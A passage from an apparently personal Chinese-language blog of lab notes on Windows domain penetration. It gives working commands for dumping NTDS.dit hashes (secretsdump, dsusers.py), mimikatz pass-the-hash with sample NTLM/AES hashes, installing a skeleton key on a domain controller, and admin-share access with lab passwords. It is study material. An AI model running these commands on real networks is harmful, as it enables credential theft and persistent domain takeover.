    <p>Step 2: 取得各个账号的hash值</p>

    <ul>
      <li>
        <p>Method 1: 使用Impacket/secretsdump.py取得所有账户的hash值 
  <code class="language-plaintext highlighter-rouge">$ python secretdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL</code></p>
      </li>
      <li>
        <p>Method 2: 使用<a href="https://github.com/libyal/libesedb/releases">esedbexport</a> 
  <code class="language-plaintext highlighter-rouge">/usr/local/bin/esedbexport -m tables ntds.dit</code></p>
      </li>
    </ul>
  </li>
  <li>Step 3: <strong>未完成</strong>破解hash值
    <ul>
      <li>hashcat kali虚拟机无法使用，似乎需要GPU</li>
    </ul>
  </li>
</ul>

<h5 id="132-使用ntdsxtract获取域名信息"><span class="mr-2">1.3.2: 使用ntdsxtract获取域名信息</span><a href="#132-使用ntdsxtract获取域名信息" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<ul>
  <li>Step 1： 安装</li>
</ul>

<blockquote>
  <p>$ wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz</p>

  <p>$ tar xf libesedb-experimental-20170121.tar.gz</p>

  <p>$ cd libesedb-20170121/</p>
</blockquote>

<ul>
  <li>Step 2: 根据第一步得到的表格，通过dsuser.py脚本得到域名相关信息
    <blockquote>
      <div class="table-wrapper"><table>
        <tbody>
          <tr>
            <td>dsusers.py ../test/ntds.dit.export/datatable.3 ../test/ntds.dit.export/link_table.5 output –syshive ../test/system.hiv –passwordhashes –pwdformat ocl –ntoutfile ntout –lmoutfile lmout</td>
            <td>tee all_user_info.txt</td>
          </tr>
        </tbody>
      </table></div>
    </blockquote>
  </li>
</ul>

<h3 id="2-域渗透pass-the-hash的实现"><span class="mr-2">2. <a href="https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Pass-The-Hash%E7%9A%84%E5%AE%9E%E7%8E%B0/">域渗透——Pass The Hash的实现</a></span><a href="#2-域渗透pass-the-hash的实现" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p><strong>Principle</strong>: Attacker use latent NTLM hash instead of plaintext password to authenticate to a remote server.</p>

<p>常用工具：</p>

<p>2.1 Kali:
	- meterpreter
	- Tool: pass the hash
2.2 windows
	- python: <a href="https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py">wmiexec</a>
	- powershell: <a href="https://github.com/Kevin-Robertson/Invoke-TheHash/">powershell</a>
		- Invoke-WMIExec
		- Invoke-SMBExec
		- Invoke-SMBClient 	 
	- mimikatz: 需要管理员权限
		- 使用pass the ticket不需要管理员权限，但需要另一个工具<a href="https://github.com/gentilkiwi/kekeo">kekeo</a></p>

<p><a href="http://wooyun.jozxing.cc/static/drops/tips-11631.html">教程</a></p>
<h4 id="step-1-获取用户hash值结果如下所示"><span class="mr-2">Step 1: 获取用户hash值，结果如下所示</span><a href="#step-1-获取用户hash值结果如下所示" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>Administrator:500:aad3b435b51404eeaad3b435b51404ee:1dda962106ebf0bd4218bc4d0a78f0c9:::</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Experiment Information</th>
      <th> </th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Username</td>
      <td>Administrator</td>
    </tr>
    <tr>
      <td>Domain</td>
      <td>test</td>
    </tr>
    <tr>
      <td>NTLM</td>
      <td>1dda962106ebf0bd4218bc4d0a78f0c9</td>
    </tr>
    <tr>
      <td>AES256</td>
      <td> </td>
    </tr>
  </tbody>
</table></div>

<h4 id="step-2-使用mimikatz实现pass-the-hash"><span class="mr-2">Step 2： 使用mimikatz实现pass the hash</span><a href="#step-2-使用mimikatz实现pass-the-hash" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p><strong>Method 1</strong>: 使用账户hash值，需要管理员权限，
<code class="language-plaintext highlighter-rouge">mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:1dda962106ebf0bd4218bc4d0a78f0c9"</code></p>

<p>会弹出一个cmd，可以通过<code class="language-plaintext highlighter-rouge">dir \\192.168.139.101\c$</code>实现查看Administrator的主目录，具体其他用法还需要研究。
sekurlsa::pth /user:WORKER1 /domain:test.local /ntlm:2c24919527e360383d7c4cd6c7b0aab0</p>

<p><strong>Method 2</strong>: 使用AES_Hash值，适用于安装了KB2871997补丁的主机。[未实现]
mimikatz: 通过<code class="language-plaintext highlighter-rouge">sekurlsa::ekeys</code>可以查看本机内存中的</p>

<p><code class="language-plaintext highlighter-rouge">mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:test.com /aes256:aad4b3c9ed4b3f1ef04b5a69ff326c9bdc8c43214924fac1b96c88ad168891d3" </code></p>

<p>sekurlsa::pth /user:krbtgt /domain:test.local /aes256:159ee14fd120960a157b04dd92d1d4ba3debdf859834e76ea0d3f62cb4cf6ac1</p>

<p>用<code class="language-plaintext highlighter-rouge">mimikatz "sekurlsa::ekeys"</code>，发现Administrator账户没有AES256值。
待研究，似乎需要新建一个管理员权限，原本自带Administrator有安全问题需要禁用。</p>

<p><code class="language-plaintext highlighter-rouge">dir \\DCServer\c$</code>
<code class="language-plaintext highlighter-rouge">copy sn.txt \\DCServer\c$</code>
<code class="language-plaintext highlighter-rouge">net use</code></p>

<p>计算机管理-&gt;共享文件夹-&gt;共享</p>

<h4 id="域中各个账号的意义和权限"><span class="mr-2">域中各个账号的意义和权限</span><a href="#域中各个账号的意义和权限" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>Administrator
Guest
krbtgt
DCServer</p>

<h3 id="3-域渗透skeleton-key"><span class="mr-2">3. <a href="http://wooyun.jozxing.cc/static/drops/tips-12670.html">域渗透——Skeleton Key</a></span><a href="#3-域渗透skeleton-key" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="step-1-尝试在域内主机与域服务器建立网络连接"><span class="mr-2">Step 1: 尝试在域内主机与域服务器建立网络连接</span><a href="#step-1-尝试在域内主机与域服务器建立网络连接" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<blockquote>
  <p><code class="language-plaintext highlighter-rouge">net use \\DCServer.test.com Xjc123 /user:Administrator@test.com</code>
<code class="language-plaintext highlighter-rouge">net use \\DCServer.test.com Xjc123456 /user:Jason@test.com</code>
<code class="language-plaintext highlighter-rouge">dir \\DCServer.test.com\c$</code></p>
</blockquote>

<p>删除当前连接：<code class="language-plaintext highlighter-rouge">net use * /del /y</code></p>

<h4 id="step-2-在dc中通过mimikatz实现安装skeleton-key"><span class="mr-2">Step 2: 在DC中通过mimikatz实现安装skeleton key</span><a href="#step-2-在dc中通过mimikatz实现安装skeleton-key" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<blockquote>
  <p>privilege::debug
misc::skeleton</p>
</blockquote>

<p>mimikatz的默认Skeleton Key设置为mimikatz</p>

<h4 id="step-3-在域内主机通过skeleton-key实现用任意账号登录dc"><span class="mr-2">Step 3: 在域内主机通过skeleton key实现用任意账号登录DC</span><a href="#step-3-在域内主机通过skeleton-key实现用任意账号登录dc" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>测试发现，使用任意账号都能实现访问域控制器</p>

<h4 id="lsa保护"><span class="mr-2">LSA保护</span><a href="#lsa保护" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>【似乎在windows 2008没用】Step 1: 设置LSA保护
注册表位置：<code class="language-plaintext highlighter-rouge">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa</code></p>

<p>新建-DWORD值，名称为RunAsPPL,数值为00000001</p>

<h3 id="3-域渗透dump-clear-text-password-after-kb2871997-installed"><span class="mr-2">3. <a href="http://drops.xmd5.com/static/drops/papers-16818.html">域渗透——Dump Clear-Text Password after KB2871997 installed</a></span><a href="#3-域渗透dump-clear-text-password-after-kb2871997-installed" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h3 id="4-域渗透pass-the-ticket"><span class="mr-2">4. <a href="http://wooyun.jozxing.cc/static/drops/tips-12159.html">域渗透——Pass The Ticket</a></span><a href="#4-域渗透pass-the-ticket" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>漏洞：MS14-068
工具：</p>
<ol>
  <li>PyKEK</li>
  <li>kekeo</li>
  <li></li>
</ol>

<hr />

<h3 id="问题总结"><span class="mr-2">问题总结</span><a href="#问题总结" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<ol>
  <li>
    <p>Windows Server 建立域环境和DNS服务器后使用<code class="language-plaintext highlighter-rouge">nslookup</code>	时显示<code class="language-plaintext highlighter-rouge">DNS Server timed out</code>:</p>

    <p><a href="https://www.youtube.com/watch?v=-34CkgCAk4g">解决方法</a>:在DNS反向查找里新建区域，并新建指针，指向DNS服务器。</p>
  </li>
  <li>
    <p>Windows Server 配置静态IP地址和DNS服务器时输入完默认DNS服务器IP地址会默认变成空：</p>

    <p>解决方法：设置为自动获取IP地址，再重新设置为静态IP即可解决这个问题。</p>
  </li>
  <li>
    <p>Windows Server 高级共享设置，无法启用网络发现：</p>

    <p><a href="http://blog.51cto.com/46562434/1156582">解决方法</a>：
 先检查是否发生问题2中的情况，再检查是否启用服务：</p>
    <ul>
      <li>Function Discovery Resource Publication</li>
      <li>SSDP Discovery</li>
      <li>UPnP Device Host</li>
    </ul>
  </li>
  <li>
    <p>【终止，因为要钱】在安装ATA的过程中遇到的问题：</p>

    <ul>
      <li>
        <p>在Windows 2008 R2 Enterprise中安装.Net Framework 4.6.1一直失败，找到解决问题的办法：<a href="https://community.spiceworks.com/topic/2094646-net-4-5-2-install-fails-on-vm-server-2008-r2-sp1">来源</a></p>

        <p>下载offline的.Net 4.6.1的安装包，用<a href="https://www.codetwo.com/kb/msi-from-exe/">某种技巧</a>提取exe中的msi文件，我使用7-zip软件提取，找到<code class="language-plaintext highlighter-rouge">netfx_Full_x64</code>文件即可完成安装绕过检查。</p>
      </li>
    </ul>
  </li>
  <li>
    <p>Hashcat无法使用</p>
  </li>
</ol>

<blockquote>
  <p>clGetDeviceIDs(): CL_DEVICE_NOT_FOUND</p>

  <p>clGetDeviceIDs(): CL_DEVICE_NOT_FOUND</p>

  <p>No devices found/left.</p>
</blockquote>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/tags/security/"
          class="post-tag no-text-decoration" >Security</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Permeation%20Skills%20-%20c0ldstudy&url=http%3A%2F%2Fc0ldstudy.github.io%2Fposts%2FPermeation_Skills%2F" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Permeation%20Skills%20-%20c0ldstudy&u=http%3A%2F%2Fc0ldstudy.github.io%2Fposts%2FPermeation_Skills%2F" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://t.me/share/url?url=http%3A%2F%2Fc0ldstudy.github.io%2Fposts%2FPermeation_Skills%2F&text=Permeation%20Skills%20-%20c0ldstudy" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- panel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">

    <div class="access">
      















  <div id="access-lastmod" class="post">
    <div class="panel-heading">Recently Updated</div>
    <ul class="post-content pl-0 pb-1 ml-1 mt-2">
      
        
        
        
      <li><a href="/posts/ChatGPT_Prompt/">ChatGPT Prompt Course Note</a></li>
      
        
        
        
      <li><a href="/posts/Paper_Summary_2023/">Paper Summary 2023</a></li>
      
        
        
        
      <li><a href="/posts/Coding_Interview/">Coding Interview</a></li>
      
        
        
        
      <li><a href="/posts/PC_attack/">[DSN2023] On Adversarial Robustness of Point Cloud Semantic Segmentation</a></li>
      
        
        
        
      <li><a href="/posts/C&W_Attack/">C&W Attack</a></li>
      
    </ul>
  </div> <!-- #access-lastmod -->



      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/phd/">PhD</a>
    
      
      <a class="post-tag" href="/tags/security/">Security</a>
    
      
      <a class="post-tag" href="/tags/machine-learning/">Machine Learning</a>
    
      
      <a class="post-tag" href="/tags/website/">Website</a>
    
      
      <a class="post-tag" href="/tags/system/">System</a>
    
      
      <a class="post-tag" href="/tags/ctf/">CTF</a>
    
      
      <a class="post-tag" href="/tags/conferences/">Conferences</a>
    
      
      <a class="post-tag" href="/tags/design/">Design</a>
    
      
      <a class="post-tag" href="/tags/network/">Network</a>
    
      
      <a class="post-tag" href="/tags/skills/">Skills</a>
    

    </div>
  </div>


    </div>

    
      
      



  <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
    <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
    <nav id="toc"></nav>
  </div>

  <!-- toc.js will be loaded at medium priority -->
  <script src="https://cdn.jsdelivr.net/npm/tocbot@4.20.1/dist/tocbot.min.js"></script>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4 mt-5">
    
      
      <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->





  <div id="related-posts" class="mb-2 mb-sm-4">
    <h3 class="pt-2 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/powershell_cookbook/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1492412400"
    data-df="ll"
    >
  Apr 17, 2017
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>powershell cookbook</h3>
            <div class="text-muted small">
              <p>
                





                1.使用指南

1.1运行脚本（调用操作：命令名中包含空格）

&amp;amp; &#39;C:\Program Files\Program.exe&#39; arguments
当前目录下：.\Program.exe arguments


1.3配置文件

Prompt()函数


1.4帮助

Get-Command/Get-Help


1.7命令转化为Base64编码

$commands = &#39;1.....
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1509087600"
    data-df="ll"
    >
  Oct 27, 2017
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>安全笔记概论</h3>
            <div class="text-muted small">
              <p>
                





                1 概论


  攻击流程
    
      预攻击：收集信息，进行决策
      攻击：进行攻击，获得权限，进行渗透
      后攻击：长期控守，维持权限，消除痕迹
    
  
  APT攻击（高级持续性攻击）
    
      定向信息收集：针对性收集，包括网络隐蔽扫描和社工方法
      外网攻击突破：恶意代码攻击个人终端或者单位服务器
      构建控制通道：采用...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B02/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1510387200"
    data-df="ll"
    >
  Nov 11, 2017
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>安全笔记--Web攻击技术</h3>
            <div class="text-muted small">
              <p>
                





                2 Web攻击技术
2.1 Web漏洞概述


  OWASP(Opwn Web Application Security Project)
    
      owaspbwa
    
  
  注入
  失效的身份认证和会话管理
    
      Padding Oracle会话管理漏洞研究一波
        
          对称加密 + CBC
        
   ...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


    
      
      <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/IP_Command/" class="btn btn-outline-primary"
    prompt="Older">
    <p>IP Command</p>
  </a>
  

  
  <a href="/posts/Windows_Hash_Achievement_via_VSS/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Windows Hash Achievement via VSS</p>
  </a>
  

</div>

    
      
      <!--  The comments switcher -->

  
  <!-- https://giscus.app/ -->
<script type="text/javascript">
  $(function () {
    const origin = "https://giscus.app";
    const iframe = "iframe.giscus-frame";
    const lightTheme = "light";
    const darkTheme = "dark_dimmed";
    let initTheme = lightTheme;

    if ($("html[data-mode=dark]").length > 0
        || ($("html[data-mode]").length == 0
            && window.matchMedia("(prefers-color-scheme: dark)").matches)) {
      initTheme = darkTheme;
    }

    let giscusAttributes = {
      "src": "https://giscus.app/client.js",
      "data-repo": "C0ldstudy/c0ldstudy.github.io",
      "data-repo-id": "MDEwOlJlcG9zaXRvcnkyMzgxNzM1ODU=",
      "data-category": "Announcements",
      "data-category-id": "DIC_kwDODjI9kc4CV58d",
      "data-mapping": "pathname",
      "data-reactions-enabled": "1",
      "data-emit-metadata": "0",
      "data-theme": initTheme,
      "data-input-position": "bottom",
      "data-lang": "",
      "crossorigin": "anonymous",
      "async": ""
    };

    let giscusScript = document.createElement("script");
    Object.entries(giscusAttributes).forEach(([key, value]) => giscusScript.setAttribute(key, value));
    document.getElementById("tail-wrapper").appendChild(giscusScript);

    addEventListener("message", (event) => {
      if (event.source === window && event.data &&
            event.data.direction === ModeToggle.ID) {
        /* global theme mode changed */
        const mode = event.data.message;
        const theme = (mode === ModeToggle.DARK_MODE ? darkTheme : lightTheme);

        const message = {
          setConfig: {
            theme: theme
          }
        };

        const giscus = document.querySelector(iframe).contentWindow;
        giscus.postMessage({ giscus: message }, origin);
      }

    });

  });
</script>



    
  </div>
</div>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/phd/">PhD</a>
    
      
      <a class="post-tag" href="/tags/security/">Security</a>
    
      
      <a class="post-tag" href="/tags/machine-learning/">Machine Learning</a>
    
      
      <a class="post-tag" href="/tags/website/">Website</a>
    
      
      <a class="post-tag" href="/tags/system/">System</a>
    
      
      <a class="post-tag" href="/tags/ctf/">CTF</a>
    
      
      <a class="post-tag" href="/tags/conferences/">Conferences</a>
    
      
      <a class="post-tag" href="/tags/design/">Design</a>
    
      
      <a class="post-tag" href="/tags/network/">Network</a>
    
      
      <a class="post-tag" href="/tags/skills/">Skills</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    <!-- The Footer -->

<footer>
    <div class="container pl-lg-4 pr-lg-4">
      <div hidden>
        <div class="github_chart">
          <img src="http://ghchart.rshah.org/409ba5/C0ldstudy" alt="C0ldstudy's Blue Github chart"/>
          <script type='text/javascript' id='clustrmaps' src='//cdn.clustrmaps.com/map_v2.js?cl=ffffff&w=300&t=tt&d=PWaejm3rz2TG6HOtwcekX2kM9kPWz2aP6GYhuOVoNpA'></script>
        </div>
      </div>

        <div class="d-flex justify-content-between align-items-center text-muted ml-md-3 mr-md-3">
        <div class="footer-left">
          <p class="mb-0">
            © 2023
            <a href="https://twitter.com/JiacenXu">Jiacen (Jason) Xu</a>.
            
            <span data-toggle="tooltip" data-placement="top"
              title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
            
          </p>
        </div>

        <!-- <script  type="text/javascript" id="clustrmaps" src="//clustrmaps.com/map_v2.js?d=PWaejm3rz2TG6HOtwcekX2kM9kPWz2aP6GYhuOVoNpA&cl=ffffff&w=a"></script> -->
        <div class="footer-right">
          <p class="mb-0"><!-- Using the <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> theme <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>. -->
          </p>
        </div>
      </div>
    </div>
  </footer>


    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    
      <div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true"
        data-animation="true" data-autohide="false">
        <div class="toast-header">
          <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="toast-body text-center pt-0">
          <p class="pl-2 pr-2 mb-3">A new version of content is available.</p>
          <button type="button" class="btn btn-primary" aria-label="Update">
            Update
          </button>
        </div>
      </div>
    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No results found.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!-- JS selector for site. -->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/lazysizes@5.3.2/lazysizes.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js"></script>





  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1.11.6/dayjs.min.js,npm/dayjs@1.11.6/locale/en.min.js,npm/dayjs@1.11.6/plugin/relativeTime.min.js,npm/dayjs@1.11.6/plugin/localizedFormat.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

